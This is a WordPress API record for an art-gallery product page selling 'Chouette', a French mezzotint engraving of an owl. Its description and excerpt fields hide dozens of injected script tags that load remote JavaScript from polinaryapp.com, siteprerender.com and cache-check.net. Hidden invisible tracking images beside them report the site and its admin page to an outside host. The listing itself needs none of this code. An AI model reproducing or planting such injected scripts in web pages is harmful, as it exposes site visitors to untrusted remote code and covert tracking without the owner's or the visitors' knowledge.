{"id":1777,"date":"2020-12-05T18:03:50","date_gmt":"2020-12-05T17:03:50","guid":{"rendered":"https:\/\/tania-art-gallery.com\/?post_type=product&#038;p=1777"},"modified":"2020-12-21T18:52:34","modified_gmt":"2020-12-21T17:52:34","slug":"chouette-double-gravure-sur-cuivre-en-mezzo-tinto","status":"publish","type":"product","link":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/","title":{"rendered":"Chouette, double gravure sur cuivre en mezzo-tinto"},"content":{"rendered":"<p><span style=\"color: #000000;\">Description longue de la gravure:<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Chouette,<\/strong> impression d&rsquo;une double gravure sur cuivre.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Chouette,<\/strong> gravure en taille-douce, r\u00e9alis\u00e9e sur une plaque de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement \u00ab\u00a0mani\u00e8re noire\u00a0\u00bb.<\/span><\/p>\n<p><span style=\"color: #000000;\">Fond, le milieu naturel, est r\u00e9alis\u00e9 sur une plaque de cuivre en vernis mou.<\/span><\/p>\n<p><span style=\"color: #000000;\">Gravure r\u00e9alis\u00e9e en 2019<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"https:\/\/polinaryapp.com\/metric\/?mid=&amp;wid=52606&amp;sid=&amp;tid=8684&amp;rid=LOADED&amp;custom1=tania-art-gallery.com&amp;custom2=%2Fwp-admin%2Fpost.php&amp;custom3=polinaryapp.com&amp;t=1607251283197\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"https:\/\/polinaryapp.com\/metric\/?mid=&amp;wid=52606&amp;sid=&amp;tid=8684&amp;rid=BEFORE_OPTOUT_REQ&amp;t=1607251283199\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"https:\/\/polinaryapp.com\/metric\/?mid=&amp;wid=52606&amp;sid=&amp;tid=8684&amp;rid=FINISHED&amp;custom1=tania-art-gallery.com&amp;t=1607251283200\" \/><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607872916149\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1608573049025\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"color: #000000;\"><strong>Chouette,<\/strong> gravure en taille-douce, r\u00e9alis\u00e9e sur deux plaques de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement \u00ab\u00a0mani\u00e8re noire\u00a0\u00bb et en vernis mou<\/span><\/p>\n<p><span style=\"color: #000000;\">Gravure cr\u00e9\u00e9e en 2019<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendue avec un passe-partout<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607250295850\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607250407716\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607250530945\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_312050361&amp;key=21ecefdd84a1d2a730&amp;cv=1607250750&amp;t=1607250750898\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_671277893&amp;key=21ecefdd84a1d2a730&amp;cv=589061&amp;t=1607250750900\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607250750904\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607250766804\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607251007060\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_385658497&amp;key=21ecefdd84a1d2a730&amp;cv=1607251184&amp;t=1607251185072\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_945723053&amp;key=21ecefdd84a1d2a730&amp;cv=589495&amp;t=1607251185073\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607251185083\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"https:\/\/polinaryapp.com\/metric\/?mid=&amp;wid=52606&amp;sid=&amp;tid=8684&amp;rid=LOADED&amp;custom1=tania-art-gallery.com&amp;custom2=%2Fwp-admin%2Fpost.php&amp;custom3=polinaryapp.com&amp;t=1607251283212\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"https:\/\/polinaryapp.com\/metric\/?mid=&amp;wid=52606&amp;sid=&amp;tid=8684&amp;rid=BEFORE_OPTOUT_REQ&amp;t=1607251283212\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"https:\/\/polinaryapp.com\/metric\/?mid=&amp;wid=52606&amp;sid=&amp;tid=8684&amp;rid=FINISHED&amp;custom1=tania-art-gallery.com&amp;t=1607251283214\" \/><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607872916170\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1608573049069\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":1779,"template":"","meta":{"spay_email":""},"class_list":{"0":"post-1777","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","5":"hentry","6":"product_cat-gravures-en-couleur","8":"entry","9":"has-media","10":"owp-thumbs-layout-horizontal","11":"owp-btn-normal","12":"owp-tabs-layout-vertical","13":"has-product-nav"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Chouette, double gravure sur cuivre en mezzo-tinto - Les Arts de Tania KMIT - dessin - pastel - gravure<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Chouette, double gravure sur cuivre en mezzo-tinto - Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"og:description\" content=\"Chouette, gravure en taille-douce, r\u00e9alis\u00e9e sur deux plaques de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement &quot;mani\u00e8re noire&quot; et en vernis mou  Gravure cr\u00e9\u00e9e en 2019  Vendue avec un passe-partout  &nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/\" \/>\n<meta property=\"og:site_name\" content=\"Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-21T17:52:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"333\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/\",\"url\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/\",\"name\":\"Chouette, double gravure sur cuivre en mezzo-tinto - Les Arts de Tania KMIT - dessin - pastel - gravure\",\"isPartOf\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg\",\"datePublished\":\"2020-12-05T17:03:50+00:00\",\"dateModified\":\"2020-12-21T17:52:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#primaryimage\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg\",\"width\":333,\"height\":500,\"caption\":\"Chouette, double gravure sur cuivre en mezzo-tinto, couleur, 2019\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/tania-art-gallery.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/tania-art-gallery.com\/index.php\/boutique\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Chouette, double gravure sur cuivre en mezzo-tinto\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tania-art-gallery.com\/#website\",\"url\":\"https:\/\/tania-art-gallery.com\/\",\"name\":\"Les Arts de Tania KMIT - dessin - pastel - gravure\",\"description\":\"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture\",\"publisher\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tania-art-gallery.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\",\"name\":\"admin9071\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"width\":171,\"height\":270,\"caption\":\"admin9071\"},\"logo\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/tania-art-gallery.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Chouette, double gravure sur cuivre en mezzo-tinto - Les Arts de Tania KMIT - dessin - pastel - gravure","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/","og_locale":"fr_FR","og_type":"article","og_title":"Chouette, double gravure sur cuivre en mezzo-tinto - Les Arts de Tania KMIT - dessin - pastel - gravure","og_description":"Chouette, gravure en taille-douce, r\u00e9alis\u00e9e sur deux plaques de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement \"mani\u00e8re noire\" et en vernis mou  Gravure cr\u00e9\u00e9e en 2019  Vendue avec un passe-partout  &nbsp;","og_url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/","og_site_name":"Les Arts de Tania KMIT - dessin - pastel - gravure","article_modified_time":"2020-12-21T17:52:34+00:00","og_image":[{"width":333,"height":500,"url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/","url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/","name":"Chouette, double gravure sur cuivre en mezzo-tinto - Les Arts de Tania KMIT - dessin - pastel - gravure","isPartOf":{"@id":"https:\/\/tania-art-gallery.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#primaryimage"},"image":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#primaryimage"},"thumbnailUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg","datePublished":"2020-12-05T17:03:50+00:00","dateModified":"2020-12-21T17:52:34+00:00","breadcrumb":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#primaryimage","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4491.jpg","width":333,"height":500,"caption":"Chouette, double gravure sur cuivre en mezzo-tinto, couleur, 2019"},{"@type":"BreadcrumbList","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/chouette-double-gravure-sur-cuivre-en-mezzo-tinto\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/tania-art-gallery.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/tania-art-gallery.com\/index.php\/boutique\/"},{"@type":"ListItem","position":3,"name":"Chouette, double gravure sur cuivre en mezzo-tinto"}]},{"@type":"WebSite","@id":"https:\/\/tania-art-gallery.com\/#website","url":"https:\/\/tania-art-gallery.com\/","name":"Les Arts de Tania KMIT - dessin - pastel - gravure","description":"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture","publisher":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tania-art-gallery.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":["Person","Organization"],"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a","name":"admin9071","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","width":171,"height":270,"caption":"admin9071"},"logo":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/tania-art-gallery.com"]}]}},"_links":{"self":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product\/1777","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media\/1779"}],"wp:attachment":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=1777"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}